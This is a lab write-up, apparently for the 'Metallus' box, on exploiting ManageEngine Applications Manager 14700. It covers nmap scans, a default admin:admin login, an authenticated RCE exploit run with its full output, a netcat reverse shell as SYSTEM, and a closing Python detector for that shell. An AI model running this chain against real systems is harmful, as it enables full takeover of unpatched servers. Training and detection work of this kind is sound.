Exploitation Guide for Metallus
We will exploit a vulnerable web application that still accepts default credentials to obtain remote code execution (RCE).
# Nmap full tcp
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/scans]
└─$ sudo nmap $ip -p- -vv --reason -sVS -Pn
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
5040/tcp open unknown syn-ack ttl 127
12000/tcp open cce4x? syn-ack ttl 127
22222/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_8.1 (protocol 2.0)
40443/tcp open unknown syn-ack ttl 127
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49832/tcp open tcpwrapped syn-ack ttl 127
49853/tcp open java-rmi syn-ack ttl 127 Java RMI
49879/tcp open unknown syn-ack ttl 127
49944/tcp open unknown syn-ack ttl 127
49945/tcp open unknown syn-ack ttl 127
A detailed scan of the unidentified ports reveals an HTTP service running on port 40443.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/scans]
└─$ nmap $ip -p 40443,49853,49832 -A -Pn
PORT STATE SERVICE VERSION
40443/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Set-Cookie: JSESSIONID_APM_40443=663DA4E3DAC70C0C4A07F4810818803E; Path=/; HttpOnly
| Accept-Ranges: bytes
| ETag: W/"261-1591076589000"
| Last-Modified: Tue, 02 Jun 2020 05:43:09 GMT
| Content-Type: text/html
| Content-Length: 261
| Date: Tue, 24 Aug 2021 05:38:58 GMT
| Connection: close
| Server: AppManager
| <!-- $Id$ -->
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
| <html>
| <head>
| <!-- This comment is for Instant Gratification to work applications.do -->
| <script>
| window.open("/webclient/common/jsp/home.jsp", "_top");
| </script>
. . .
It is an application manager: the Server header reads AppManager and the landing page redirects to /webclient/common/jsp/home.jsp.
Logging in with the default credentials admin:admin succeeds.
Next, look for known exploits.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/exploit]
└─$ searchsploit manageengine 14700
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated) | java/webapps/48793.py
ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload | jsp/webapps/29674.txt
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Applications Manager is vulnerable to an authenticated RCE. Since we already have valid credentials, we will use this exploit to get a shell. Copy the exploit to your working directory.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/exploit]
└─$ searchsploit -m java/webapps/48793.py
Exploit: ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/48793
Path: /usr/share/exploitdb/exploits/java/webapps/48793.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/kali/oscp/boxes/pg/metallus/exploit/48793.py
The script requires javac. Install it with one of the following commands:
sudo apt install default-jdk
or
sudo apt install openjdk-11-jdk
Now start a netcat listener and run the script.
# change the target URL, listener IP and port to match your setup
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/exploit]
└─$ sudo python3 48793.py http://192.168.245.96:40443 admin admin 192.168.49.245 443
[*] Visiting page to retrieve initial cookies...
[*] Retrieving admin cookie...
[*] Getting base directory of ManageEngine...
[*] Found base directory: C:\Program Files\ManageEngine\AppManager14
[*] Creating JAR file...
added manifest
adding: weblogic/jndi/Environment.class(in = 1844) (out= 1081)(deflated 41%)
[*] Uploading JAR file...
[*] Attempting to upload JAR directly to targeted Weblogic folder...
[!] Failed to upload JAR directly, continue to add and execute job to move JAR...
[*] Creating a task to move the JAR file to relative path: classes/weblogic/version8/...
[*] Found actionname: move_weblogic_jar3229 with found actionid 10000003
[*] Executing created task with id: 10000003 to copy JAR...
[*] Task 10000003 has been executed successfully
[*] Deleting created task as JAR has been copied...
[*] Running the Weblogic credentialtest which triggers the code in the JAR...
[*] Check your shell...
You will get a shell as NT AUTHORITY\SYSTEM (the Windows equivalent of root).
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/metallus/scans]
└─$ sudo nc -nvlp 443
[sudo] password for imtodess:
listening on [any] 443 ...
connect to [192.168.49.245] from (UNKNOWN) [192.168.245.96] 49815
Microsoft Windows [Version 10.0.18362.1082]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files\ManageEngine\AppManager14\working>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
<Redacted>
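As an added defender-side example that is not part of the original walkthrough, the following Python detection flags the shape of the shell obtained above: a command interpreter spawned by the Applications Manager Java process, running as SYSTEM from the AppManager working directory. The event records are constructed to resemble Sysmon process-creation fields; the field names and the location of java.exe under the AppManager tree are assumptions.

```python
"""Flag a command interpreter spawned by the ManageEngine Applications Manager
Java process, the parent/child shape of the reverse shell in this walkthrough."""
from typing import Iterable, Optional

# Base directory as reported by the exploit script; compared case-insensitively.
APPMANAGER_BASE = r"c:\program files\manageengine\appmanager14"
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed Sysmon-style (Event ID 1) process-creation records. Field names and
# the java.exe path under the AppManager tree are assumptions for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\ManageEngine\AppManager14\jre\bin\java.exe",
     "ParentImage": r"C:\Program Files\ManageEngine\AppManager14\bin\wrapper.exe",
     "User": r"NT AUTHORITY\SYSTEM",
     "CurrentDirectory": r"C:\Program Files\ManageEngine\AppManager14\working"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\ManageEngine\AppManager14\jre\bin\java.exe",
     "User": r"NT AUTHORITY\SYSTEM",
     "CurrentDirectory": r"C:\Program Files\ManageEngine\AppManager14\working"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"METALLUS\Administrator",
     "CurrentDirectory": r"C:\Users\Administrator"},
]

def basename(path: str) -> str:
    """Last path component, lower-cased, tolerating either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> Optional[str]:
    """Return a severity for a suspicious event, or None if it looks benign."""
    parent = event.get("ParentImage", "").lower()
    if not (parent.startswith(APPMANAGER_BASE) and basename(parent) == "java.exe"):
        return None
    if basename(event.get("Image", "")) not in INTERPRETERS:
        return None
    # A shell from the monitoring service's Java process as SYSTEM matches the
    # post-exploitation footprint shown in the walkthrough exactly.
    if event.get("User", "").lower() == r"nt authority\system":
        return "high"
    return "medium"

def find_appmanager_shells(events: Iterable[dict]) -> list:
    """Return (severity, event) pairs for every event classify() flags."""
    return [(sev, e) for e in events if (sev := classify(e))]

if __name__ == "__main__":
    for severity, event in find_appmanager_shells(SAMPLE_EVENTS):
        print(severity, event["ParentImage"], "->", event["Image"], "as", event["User"])
```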